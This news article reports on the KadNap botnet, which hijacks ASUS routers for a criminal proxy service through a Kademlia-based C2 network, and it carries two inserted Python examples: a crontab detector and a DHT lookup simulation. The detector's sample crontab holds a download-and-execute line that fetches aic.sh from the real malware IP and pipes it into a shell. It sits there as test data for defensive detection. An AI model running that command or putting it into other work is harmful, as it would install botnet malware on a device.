New KadNap botnet hijacks ASUS routers to fuel cybercrime proxy network
Summary: The newly discovered KadNap malware targets ASUS routers and other edge network devices, turning them into proxies for malicious traffic. It builds a peer-to-peer network over a custom Kademlia protocol, which makes its C2 servers harder to identify and disrupt. Some 14,000 devices have been infected so far, located mainly in the United States, Taiwan, Hong Kong and Russia. Researchers found that it relies on a decentralized mechanism to hide its infrastructure, but a weakness in that design allows it to be tracked.
2026-3-10 15:2:13 Author: www.bleepingcomputer.com


A newly discovered botnet malware called KadNap is targeting ASUS routers and other edge networking devices to turn them into proxies for malicious traffic.

Since August 2025, KadNap has grown to 14,000 devices that are part of a peer-to-peer network and connect to the command-and-control (C2) infrastructure through a custom version of the Kademlia Distributed Hash Table (DHT) protocol.

This makes identifying and disrupting the C2 servers more difficult because the information is decentralized, and each node manages a subset of the complete data.

According to researchers at Black Lotus Labs, the threat research and operations arm of Lumen Technologies, nearly half of the KadNap network is connected to C2 infrastructure dedicated to ASUS-based bots, and the rest communicate with two separate control servers.

Most infected devices are located in the United States, which accounts for 60% of the total, followed by significant percentages in Taiwan, Hong Kong, and Russia.

Figure: Number of victims over time (Source: Black Lotus Labs)

Kademlia-based communication

A KadNap infection begins with downloading a malicious script (aic.sh) from 212.104.141[.]140, which establishes persistence via a cron job that runs every 55 minutes. The payload is an ELF binary named kad, which installs the KadNap client.

Once active, the malware determines the host’s external IP address and contacts multiple Network Time Protocol (NTP) servers to obtain the current time and system uptime.
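The infection chain above leaves a concrete, host-level trace: a cron job on a 55-minute schedule that fetches aic.sh from 212.104.141[.]140 and installs the kad binary. The following detector is an added example written for this article, not code from Black Lotus Labs or BleepingComputer. It parses a crontab, flags entries that reference the indicators the article names, that use a 55-minute step schedule, or that pipe a downloaded script straight into a shell. The exact cron expression the malware writes is not on the page, so the `*/55` form and the sample crontab are constructed assumptions.

```python
import re

# Indicators named in the article (the defanged IP is re-armed for string matching).
KNOWN_IOC_SUBSTRINGS = ("212.104.141.140", "aic.sh")
# The ELF payload is named "kad"; match it as a whole token on a command line.
KNOWN_IOC_PATTERNS = (re.compile(r"(?:^|[/\s])kad(?:\s|$)"),)
# Generic download-and-execute pattern: curl/wget output piped into a shell.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash)\b")


def cron_minute_period(minute_field: str):
    """Return N if the minute field is a '*/N' step expression, else None."""
    m = re.fullmatch(r"\*/(\d+)", minute_field.strip())
    return int(m.group(1)) if m else None


def parse_crontab_line(line: str):
    """Split a crontab line into its five time fields and the command.
    Returns None for blank lines, comments and environment assignments."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
        return None
    parts = s.split(None, 5)
    if len(parts) < 6:
        return None
    return {"minute": parts[0], "hour": parts[1], "dom": parts[2],
            "month": parts[3], "dow": parts[4], "command": parts[5]}


def assess_crontab(text: str):
    """Return a list of findings, one per suspicious crontab entry."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = parse_crontab_line(line)
        if entry is None:
            continue
        reasons = []
        for ioc in KNOWN_IOC_SUBSTRINGS:
            if ioc in entry["command"]:
                reasons.append(f"references known KadNap indicator {ioc!r}")
        for pat in KNOWN_IOC_PATTERNS:
            if pat.search(entry["command"]):
                reasons.append("runs a binary named 'kad' (KadNap client name)")
        # Assumption: a 55-minute cadence is expressed as a '*/55' minute step.
        if cron_minute_period(entry["minute"]) == 55 and entry["hour"] == "*":
            reasons.append("55-minute step schedule matching the reported persistence")
        if PIPE_TO_SHELL.search(entry["command"]):
            reasons.append("downloads a script and pipes it straight into a shell")
        if reasons:
            findings.append({"line": n, "command": entry["command"], "reasons": reasons})
    return findings


# Constructed sample crontab; not a real capture from an infected router.
SAMPLE_CRONTAB = """\
# constructed sample, not a real capture
SHELL=/bin/sh
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/55 * * * * wget -q http://212.104.141.140/aic.sh -O- | sh
*/5 * * * * /opt/monitor/check.sh
"""

if __name__ == "__main__":
    for f in assess_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {f['command']}")
        for r in f["reasons"]:
            print(f"  - {r}")
```

On a real device the input would be the root crontab and the files under /etc/cron.d; the IoC list should be replaced by the indicators Lumen releases, since the 55-minute heuristic on its own will also match legitimate jobs.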

Figure: Function to create the malicious cron job (Source: Black Lotus Labs)

For evasion and resistance to takedowns, KadNap uses a modified Kademlia-based DHT protocol to locate botnet nodes and the C2 infrastructure.

“KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring,” the researchers explain.

“Infected devices use the DHT protocol to locate and connect with a command-and-control (C2) server, while defenders cannot easily find and add those C2s to threat lists.”

The researchers discovered that KadNap’s implementation of Kademlia is undermined by a consistent connection to two specific nodes, which occurs before reaching the C2 servers. This reduces the decentralization that the protocol could achieve in the ideal case and makes it possible to identify the control infrastructure.
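The weakness described above is easiest to see in a small simulation of the Kademlia lookup itself. The code below is an added example, not Black Lotus Labs' analysis code or anything recovered from the malware: it implements the standard iterative FIND_NODE lookup over XOR distance, builds a constructed network of peers with two well-connected entry nodes, and compares what a network monitor would observe when every bot starts its lookup from the same two hardcoded nodes (the KadNap case) against bots that start from previously learned peers (ideal Kademlia). All node labels, the rendezvous key and the routing tables are constructed.

```python
import hashlib
import random


def node_id(label: str) -> int:
    """Derive a 160-bit Kademlia node id from a label (SHA-1, as in the original design)."""
    return int.from_bytes(hashlib.sha1(label.encode()).digest(), "big")


def xor_distance(a: int, b: int) -> int:
    """Kademlia distance metric: the XOR of two ids, compared as integers."""
    return a ^ b


class Peer:
    """A simulated peer that answers FIND_NODE from a small routing table."""

    def __init__(self, pid: int, known: set):
        self.id = pid
        self.known = set(known) - {pid}

    def find_node(self, target: int, k: int) -> list:
        # Reply with the k peers this node knows that are closest to the target.
        return sorted(self.known, key=lambda n: xor_distance(n, target))[:k]


def iterative_lookup(network: dict, start: list, target: int, k: int = 3):
    """Iterative Kademlia lookup: keep asking the closest unqueried peers for
    peers closer to target until the k closest known peers have all been asked.
    Returns (k closest ids found, peers contacted in order)."""
    shortlist = sorted(set(start), key=lambda n: xor_distance(n, target))
    queried, contacted = set(), []
    while True:
        pending = [n for n in shortlist[:k] if n not in queried]
        if not pending:
            return shortlist[:k], contacted
        for n in pending:
            queried.add(n)
            contacted.append(n)
            for found in network[n].find_node(target, k):
                if found not in shortlist and found in network:
                    shortlist.append(found)
        shortlist.sort(key=lambda n: xor_distance(n, target))


def build_network(n_peers: int, bootstrap_labels: list, seed: int = 7):
    """Constructed network: ordinary peers know a few random peers plus the
    bootstrap nodes; the bootstrap nodes know everyone."""
    rng = random.Random(seed)
    ids = [node_id(f"peer-{i}") for i in range(n_peers)]
    boot = [node_id(b) for b in bootstrap_labels]
    all_ids = ids + boot
    network = {pid: Peer(pid, set(rng.sample(all_ids, 6)) | set(boot)) for pid in all_ids}
    for b in boot:
        network[b] = Peer(b, set(all_ids))
    return network, ids, boot


def first_hops(network: dict, starts_per_bot: list, target: int) -> set:
    """The set of peers the bots contact first when resolving the C2 key:
    this is what a network-level monitor sees as the entry point of each lookup."""
    hops = set()
    for start in starts_per_bot:
        _, contacted = iterative_lookup(network, start, target)
        hops.add(contacted[0])
    return hops


def demo():
    network, ids, boot = build_network(60, ["bootstrap-A", "bootstrap-B"])
    c2_key = node_id("c2-rendezvous-key")  # constructed key the bots look up
    rng = random.Random(1)
    # KadNap-style: every bot begins from the same two hardcoded nodes.
    fixed = first_hops(network, [boot for _ in range(20)], c2_key)
    # Ideal Kademlia: each bot begins from a different, previously learned peer.
    diverse = first_hops(network, [[rng.choice(ids)] for _ in range(20)], c2_key)
    return fixed, diverse


if __name__ == "__main__":
    fixed, diverse = demo()
    print(f"hardcoded entry nodes: {len(fixed)} distinct first hop(s) across 20 bots")
    print(f"learned peers:         {len(diverse)} distinct first hops across 20 bots")
```

Both lookups converge on the same closest peers, so the DHT works as designed in either case; the difference is purely in what a defender observes. With hardcoded entry nodes every bot's first contact collapses onto one or two addresses, which is why those two nodes were enough for the researchers to trace the infrastructure and for a carrier to block it.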

Figure: Using the custom Kademlia implementation to find peers (Source: Black Lotus Labs)

Monetizing KadNap

Black Lotus Labs researchers say that the KadNap botnet is linked to the Doppelganger proxy service, believed to be a rebrand of the Faceless service, previously associated with the TheMoon malware botnet, which also targeted ASUS routers.

Doppelganger sells access to infected devices as residential proxies that can be used to funnel malicious traffic, create pseudonymization layers, and evade blocklists.

Figure: Doppelganger homepage (Source: Black Lotus Labs)

Such services are typically used to launch distributed denial-of-service (DDoS), credential stuffing, and brute-force attacks, all of which initially trace back to the KadNap victims whose devices relay the traffic.

Lumen has taken proactive measures against the KadNap botnet. The company says that at the time of publishing this article, it "blocked all network traffic to or from the control infrastructure."

The disruption is only on Lumen's network, and a list of indicators of compromise will be released to help others disrupt the botnet on their end.



Source: https://www.bleepingcomputer.com/news/security/new-kadnap-botnet-hijacks-asus-routers-to-fuel-cybercrime-proxy-network/